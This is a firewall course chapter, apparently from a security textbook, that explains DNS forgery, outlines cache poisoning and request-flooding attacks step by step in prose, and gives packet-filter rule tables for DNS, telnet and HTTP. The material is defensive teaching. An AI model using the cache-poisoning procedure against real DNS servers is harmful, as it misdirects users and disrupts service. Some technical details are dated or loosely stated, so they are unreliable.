Strategic Security Intelligence


Linux Firewalls


Service Level Attacks and Defenses

Copyright(c), 1990, 1995, 2002 Dr. Frederick B. Cohen - All Rights Reserved

DNS Service Attacks

An example of a UDP protocol is Domain Name Service (DNS). DNS implementes a distributed database used to translate between IP addresses and hostnames. Additional services include Start Of Authority (SOA) records that indicate what portions of the name space a server is responsible for giving definitive answers for, Mail eXchange (MX) records that provide referrals to mail servers for domain names, additional information about hosts and networks, and a wide range of other less important and optional content.

DNS runs primarily over UDP and requests are answered with (1) a known response, (2) a referral to another server, or (3) no answer at all. The third response is due to the nature of UDP services. The distributed database provides a tree structured name space that is the basis for the hostnames commonly used in the Internet.

The example shown here begins at the InterNIC, the theoretical root of the domain name space. There are about 14 root servers in the Internet, and these servers provide referals that cross Top Level Domain (TLD) name spaces. For example, '.com', '.net', '.edu', and '.org' are all TLDs.

Since UDP is the protocol used in DNS lookups, DNS replies are very easy to forge. All that has to be done is to generate a valid datagram with the source IP address of a DNS server in response to a request, and it will be trusted as accurate. The first response that appears is typically trusted, so a simple program that provides a rapid but wrong response is often effective at disrupting DNS service.

The nomral DNS lookup process starts with a lookup using the local DNS server. If the local server doesn't know the answer, it can either respond indicating that it does not know or it might look the answer up for you and return the answer when it knows it. If it simply says it doesn't know the answer, your resolver is then supposed to move up the DNS tree and ask the next higher DNS if it knows the answer. If the DNS looks it up on its own, the process is the same except that the DNS does the work through its resolver instead of through yours.

For example, if the DNS for st.com doesn't know the answer to an inquiry about all.net, the request then goes to the .com TLD followed by the root servers. The root servers refer the process to the .net TLD which go to the authoritative server for all.net which supplies the answer. Any or all of these servers may cache previous responses to save time on subsequent lookups.

Because the DNS is a tree structure, it is possible that within st.com there could be a domain names all.net.st.com. If this is the case, then looking up all.net from within st.com will typically yield all.net.st.com instead of all.net! In the example below, a forged DNS response makes all.net inaccessible from st.com and leads internal users to be sent to the internal site when all.net is requested.

The normal behavior of a White Glove CD is actually an interesting example of this. If you configure your system for networking and try to go to 'www.google.com', you will get the well known search engine. But if you try to simply enter 'google' you will find yourself conected to google.all.net. This is because in the '/etc/resolv.conf' file, the resolution process defaults to the all.net domain. The all.net domain servers in turn use a default response to any request that is otherwise unknown that brings them to the all.net web site. In fact, if you try any domain that doesn't otherwise resolve, you will be directed to the all.net web site.

The caching behavior of DNS servers also creates a major potential problem in that a forged response can induce servers at high levels to provide wrong responses over an extended period of time. This can be done by a process called cache poisoning in which the cache of servers is poisoned by false responses, typically generated along with the requests. As an example, the attacker might forge both the requests and the responses so that the details of the port numbers are available. Start by sending a request that comes from the root servers to your own DNS server, and from that get the source port number of the request from the root server. Then, make a request for all.net and generate a series of responses using destination port numbers for the root servers starting one higher thatn the port number on the request to your DNS. It is very likely that you can generate hundreds of responses before the request ever hits all.net's DNS server and beat all.net to the punch. By using a high Time To Live (TTL) field in the DNS response, you can cause the root servers to give wrong answers for a long time - perhaps weeks.

Another attack can slow down services, map out a network, and possibly crash a DNS server by simply making a lot of requests. In this case, a flood of DNS requests are made using a large number of domain names. These names cause the server to do lots of lookups, multiplying your requests by a factor of 2 to 3, thus flooding service. In addition, these requests cause local cached DNS entries to be flushed from the cache, or in some cases, to overrun local memory and crash the computer. In one case the DNS service becomes very slow, while in the other it stops entirely. The same process generates a mapping of all of the domain names and their IP addresess. For example, you can go through all of the IP addresses in an IP address range requesting all of the hostnames, thus getting an initial picture of what the distant network looks like.

Many of these DNS problems cannot be solved by firewalls, however, there are some that can. One way to solve these problems it to limit the number of DNS servers available to your users by requiring that DNS only be allowed to known good DNS servers that themselves look up other doman names and cache the results. This prevents forgers from fooling your systems, unless they are also fooling other systems that are trusted by many other Internet users. Suppose we have a list of known good caching DNS servers. We then tell our users to configure for only those servers and provide a firewall rule like this:

We start by inserting rules so that no traffic can flow into or out of either interface if it uses port 53 and is a UDP packet. Then we insert rules before these two rules that go through each of the list of valid DNS servers and allow input from and output to them on each interface so that packets from high ports on internal computers can flow to port 53 on these DNS servers and traffic from port 53 on those DNS servers can flow to high ports on internal machines, all only with UDP service. This generates 4 rules per external DNS server, or in this case 12 rules.

The resulting ordering is important and that is why rule insertion was used in each case. Since these are quite specific rules and we don't want some other rule that comes between or before them to allow an access that they deny, we must insert them at the beginning of the rule sequence. On the other hand, a subsequent rule that is never reached might allow all traffic from or to some other server. The DENY rules will prevent any DNS traffic from flowing even through the subsequent rule would otherwise allow it. They are inserted each before the last, so that the last rule inserted comes first on the list.

To test these rules, we set up a two 'tcpdump' sessions on the firewall computer and try sending DNS requests outbound from internal computers toward the identified IP addresses. This is very easily done with 'netcat' as follows:

In this case we are sending a series of 72 different DNS attempts, 66 of which should fail and only 6 of which should succeed (from the valid IP address and each of the high ports to the valid DNS servers on port 53). We can see which ones get through the firewall and which do not by watching the two screens on the firewall box. Some that will not do DNS service may get through the firewall, but that is not what we are trying to block with these rules. Verify that the proper datagrams and only those datagrams flow through the firewall. If there is additional traffic on the firewall, use additional parameters to 'tcpdump' so as to only see the appropraite traffic.

Also note that this will not prevent some of the DNS attacks listed above, and is thus only of limited value in solving the problems of DNS.

Other UDP Service Attacks

In addition to the basic lack of sequencing and authentication in UDP, individual services that run over UDP have some serious historical problems associated with them.

Students in classes should pick one of these services as an example and create an appropriate set of firewall rules to protect against attacks such as those described for it. Then implement those rules and create and run a limited test program that tests these rules to make certain they operate as desired.

TCP Service Attacks

Many of the most desired and vulnerable services operate over TCP. Some of them are listed here with brief descriptions:

This list is far from comprehensive, it is merely representative of the sorts of things you are likely to encounter when trying to determnine how to firewall your systems. If you cut off all services, you will bve relatively safer from remote attack, but you will not gain the benefits of the Internet either. If you leave too many services on, you will be attacked often and pay a high price in defending your systems.

Tunnelling, Steganography, and Protocol Fudging

All of the defenses described up to this point based on TCP wrappers make assumptions about the associations of ports with services, but these assumptions are just that and nothing more. In fact, any packets that can flow in and out of a network can be used to implement any protocol desired by those who are able to generate and observe those packets. I use the term packets here instead of datagrams for a reason. Datagrams are those sequences of protocol elements defined for IP. In other words, packets that follow the rules for datagrams. But we can put anything we want into packets and for the most part, the Internet will transport them from place to place as they are. The most common techniques are tunneling, staganographic content, and protocol fudging. All three assume an inside system is cooperating with the attack either intentionally or unwittingly.

Router Firewalling with Simple Filters

Packet filter configuration is complex to do right. It is usually an ordered sequence of rules, the first one to trigger is used. For example, (1) allow all hosts port 25 source into all hosts, (2) deny all '.edu' computers on all ports into all hosts, (3) allow all hosts port 113 into subnet-2, etc. Most have adequate tools to create them, but they are often hard to understand.

Prevent inbound telenet from all but isi.edu, allow outbound telent, deny everything else:

Source IP Source Port Dest IP Dest Port What
*.isi.edu >1023 Local 23 Allow
All All Local 23 Deny
Local 23 *.isi.edu >1023 Allow
Local >1023 All 23 Allow
All 23 Local >1023 Allow
All All All All Deny

Allow World Wide Web (http), deny everything else.

Source IP Source Port Dest IP Dest Port What
All >1023 Local 80 Allow
Local 80 All >1023 Allow
All All All All Deny

The previous 2 combined:

Source IP Source Port Dest IP Dest Port What
*.isi.edu >1023 Local 23 Allow
All All Local 23 Deny
Local 23 *.isi.edu >1023 Allow
Local >1023 All 23 Allow
All 23 Local >1023 Allow
All >1023 Local 80 Allow
Local 80 All >1023 Allow
All All All All Deny

Blocking services has limited utility for ftp (active) and some other services because (1) use random ports, (2) multiple services share ports, (3) users can open high ports. Limited to pre-designed services, IP address pairs, no built-in authentication.

Packet filters have strengths. (1) controls tend to be fairly secure, (2) easier to prove imnplementation correct, (3) inexpensive to implement and maintain. They should (1) eliminate known bad IP addresses, (2) eliminate IP address forgeries, (3) eliminate services not in use, (4) send audit trails to trusted audit servers (5) prevent control from remote sources, (6) implemente reasonable passwords, (7) be physically secure.

Packet fileters have weaknesses. (1) inadequate granularity of control, (2) limited authentication, (3) stste-independent decisions, (4) hard to manage complex configurations, (5) tunneling goes undetected, (6) poor or no misuse detection, (7) poor or no audit capabilities, (8) remote configuration limitations, (9) weak and default passwords and accesses, etc.

Enhancing Routers for Firewalling

Encryption in packet filters is provided by some routers. This can includfe key exchange and introduces key exchange issues, is generally limited to same manufacturer router pairs, allows virtual private networks (VPNs), but the chain is only as strong as the weakest link, and remote control and configuration ends up being important here.

Routers between networks provide separation of internal networks, control points for information flow paths, trade speed for protection, require transitivity analysis.

Authentication in packet filters - similar to encryption between networks, time varient password systems, challenge response systems, packet authentication, anthentication daemons.

Summary